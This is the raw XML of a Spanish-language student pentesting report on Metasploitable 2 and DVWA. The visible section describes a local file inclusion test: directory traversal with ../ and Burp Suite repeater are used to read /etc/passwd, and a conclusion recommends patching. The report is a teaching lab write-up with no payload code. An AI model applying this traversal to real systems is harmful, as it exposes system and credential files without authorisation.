      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Inclusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E2A3485" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7234">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DFCCA63">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>766445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="3150235"/>
            <wp:effectExtent l="0" t="0" r="762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150235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">En esta vulnerabilidad básicamente se pueden incluir archivos o scripts en una aplicación web, primero vemos si la vulnerabilidad existe pasando alguna cadena a la dirección </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cuando esta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> espera cargar una página:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742DA2DD" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CDDC3E" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1586F5FE" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7597BEFA" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59867561" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1651EE1F" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6028D39B" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194AD1EE" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66644B29" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A44A79" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C9D0FC" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6322E5" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C3E92BD" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora que vemos que es vulnerable podemos escapar y movernos entre directorios utilizando ../ para básicamente ir al directorio al que queramos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07905DEA" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="008A7234">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05ED01C6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="2963545"/>
            <wp:effectExtent l="0" t="0" r="7620" b="825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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="486F9A39" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7C49BB" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472580A5" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C52192" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A59989" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FFD8CB" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722C83D0" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C9B8E0" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C6478F" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B41F26" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331BEBB8" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234"/>
    <w:p w14:paraId="512EAF6F" w14:textId="77777777" w:rsidR="004F0EA3" w:rsidRDefault="004F0EA3" w:rsidP="004F0EA3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Utilizando burp suite, capturando la petición y reenviándola con el “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” tenemos que, la </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0EA3">
        <w:t>respuesta del servidor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nos</w:t>
      </w:r>
      <w:r w:rsidRPr="004F0EA3">
        <w:t xml:space="preserve"> muestra que la petición </w:t>
      </w:r>
      <w:r>
        <w:t>ha sido</w:t>
      </w:r>
      <w:r w:rsidRPr="004F0EA3">
        <w:t xml:space="preserve"> exitosa y ha devuelto el contenido del archivo /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F0EA3">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F0EA3">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F0EA3">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F0EA3">
        <w:t>. Esto confirma que la aplicación web es vulnerable a la LFI, ya que debería no permitir la inclusión de archivos críticos del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070D1B01" w14:textId="77777777" w:rsidR="004F0EA3" w:rsidRDefault="004F0EA3" w:rsidP="004F0EA3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="004F0EA3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7069B92E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="3149600"/>
            <wp:effectExtent l="0" t="0" r="762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149600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB463D">
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CD1BB80" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="004F0EA3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3512D193" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234"/>
    <w:p w14:paraId="2DFED775" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234"/>
    <w:p w14:paraId="249C824A" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234"/>
    <w:p w14:paraId="233F221B" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234"/>
    <w:p w14:paraId="480C3BC0" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234"/>
    <w:p w14:paraId="185D1BB4" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234"/>
    <w:p w14:paraId="46FC91E5" w14:textId="77777777" w:rsidR="008A7234" w:rsidRDefault="008A7234" w:rsidP="008A7234"/>
    <w:p w14:paraId="39B0DBD6" w14:textId="77777777" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00372615">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B42D30A" w14:textId="2B873DE9" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00372615">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B399AAD" w14:textId="50F67361" w:rsidR="00372615" w:rsidRPr="00372615" w:rsidRDefault="00372615" w:rsidP="00372615">
      <w:r>
        <w:t>Podemos concluir el anterior reporte mencionando que, a cada una de las vulnerabilidades encontradas y explotada resulta necesaria una operación para su mitigación, aplicar los parches recomendados</w:t>
      </w:r>
      <w:r w:rsidR="00FD1640">
        <w:t xml:space="preserve"> y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> actualizar a las versiones de software que correspondan</w:t>
      </w:r>
      <w:r w:rsidR="00FD1640">
        <w:t xml:space="preserve"> significa esencialmente reducir la superficie de ataque. En el caso de la DVWA, esta es en esencia una maquina intencionalmente vulnerable que, bajo la maquina virtual de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FD1640">
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FD1640">
        <w:t xml:space="preserve"> 2 se ejecuta. </w:t>
      </w:r>
      <w:r w:rsidR="00A35399">
        <w:t xml:space="preserve">Cada 1 de las vulnerabilidades identificadas fueron explotadas mediante distintos procesos, en generar podríamos describir el proceso de la siguiente manera: Realizamos un análisis buscando puertos abiertos, identificamos las vulnerabilidades y buscamos como explotarlas, la mayoría de las veces será utilizando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A35399">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A35399">
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A35399">
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A35399">
        <w:t>, al obtener una Shell reversa, por ejemplo, podemos escalar privilegios y entonces básicamente comprometer el sistema</w:t>
      </w:r>
      <w:r w:rsidR="005C0BB1">
        <w:t xml:space="preserve"> de la manera en que nos apetezca. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00372615" w:rsidRPr="00372615" w:rsidSect="007E0B9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BC28" w14:textId="77777777" w:rsidR="007E0B9C" w:rsidRDefault="007E0B9C" w:rsidP="00007EB3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1D87A8CC" w14:textId="77777777" w:rsidR="007E0B9C" w:rsidRDefault="007E0B9C" w:rsidP="0000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21A6" w14:textId="77777777" w:rsidR="007E0B9C" w:rsidRDefault="007E0B9C" w:rsidP="00007EB3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A21A971" w14:textId="77777777" w:rsidR="007E0B9C" w:rsidRDefault="007E0B9C" w:rsidP="0000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204"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9168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E4544"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EB41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442D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8AE03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6F4E8E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="276A8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C74424"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C394A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91550"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="882A1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456AA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C9EF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04554A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B6C4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CD3635"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="888AA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0187926">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="64033401">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1756634785">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1803426229">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1347055556">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1012563701">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1939605051">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2067995999">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1898469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C9"/>
    <w:rsid w:val="00007EB3"/>
    <w:rsid w:val="00012468"/>
    <w:rsid w:val="00023FE6"/>
    <w:rsid w:val="0003649B"/>
    <w:rsid w:val="0006447F"/>
    <w:rsid w:val="00165FA4"/>
    <w:rsid w:val="00207D1E"/>
    <w:rsid w:val="00247373"/>
    <w:rsid w:val="002575E8"/>
    <w:rsid w:val="00334D22"/>
    <w:rsid w:val="00365C20"/>
    <w:rsid w:val="00372615"/>
    <w:rsid w:val="003C74C8"/>
    <w:rsid w:val="003D61BE"/>
    <w:rsid w:val="00484BE7"/>
    <w:rsid w:val="004F0EA3"/>
    <w:rsid w:val="004F30AA"/>
    <w:rsid w:val="004F401B"/>
    <w:rsid w:val="00504B5A"/>
    <w:rsid w:val="0051771B"/>
    <w:rsid w:val="005C0BB1"/>
    <w:rsid w:val="005D24A9"/>
    <w:rsid w:val="006572DB"/>
    <w:rsid w:val="006E4A94"/>
    <w:rsid w:val="0079376C"/>
    <w:rsid w:val="007B0725"/>
    <w:rsid w:val="007E0B9C"/>
    <w:rsid w:val="00817962"/>
    <w:rsid w:val="008A15CB"/>
    <w:rsid w:val="008A2815"/>
    <w:rsid w:val="008A7234"/>
    <w:rsid w:val="00911363"/>
    <w:rsid w:val="00917E9D"/>
    <w:rsid w:val="009331C2"/>
    <w:rsid w:val="00944F50"/>
    <w:rsid w:val="00982F0E"/>
    <w:rsid w:val="009A5D6E"/>
    <w:rsid w:val="009B4B0D"/>
    <w:rsid w:val="00A35399"/>
    <w:rsid w:val="00A50144"/>
    <w:rsid w:val="00B35D3E"/>
    <w:rsid w:val="00BD18DC"/>
    <w:rsid w:val="00C121E6"/>
    <w:rsid w:val="00C558D6"/>
    <w:rsid w:val="00C741CA"/>
    <w:rsid w:val="00CD60DB"/>
    <w:rsid w:val="00D64594"/>
    <w:rsid w:val="00D8019E"/>
    <w:rsid w:val="00DB59B0"/>
    <w:rsid w:val="00DF6876"/>
    <w:rsid w:val="00E40B8C"/>
    <w:rsid w:val="00E4681E"/>
    <w:rsid w:val="00E96437"/>
    <w:rsid w:val="00EB463D"/>
    <w:rsid w:val="00EC6EE1"/>
    <w:rsid w:val="00ED3E68"/>
    <w:rsid w:val="00ED5A6E"/>
    <w:rsid w:val="00FB576D"/>
    <w:rsid w:val="00FB60C9"/>
    <w:rsid w:val="00FD1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FD68"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{238544E9-0547-47E6-9577-9C85DAAC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94"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003C74C8"/>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40B8C"/>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75E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75E8"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="es-MX"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo1Car">
    <w:name w:val="Título 1 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003C74C8"/>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40B8C"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Encabezado">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EncabezadoCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00007E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EB3"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00007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EB3"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F401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F401B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="CdigoHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F0E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9323">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1452047426">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1452358182">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="19031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590DA-E3B1-409D-ACBA-D3FE80ED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9</Pages>
  <Words>2198</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uebas de penetración a Metasploitable</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penetración a Metasploitable</dc:title>
  <dc:subject>Modulo de pentesting</dc:subject>
  <dc:creator>user</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>JOSE BENITO IBARRIA TOPETE</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-19T13:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-24T20:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>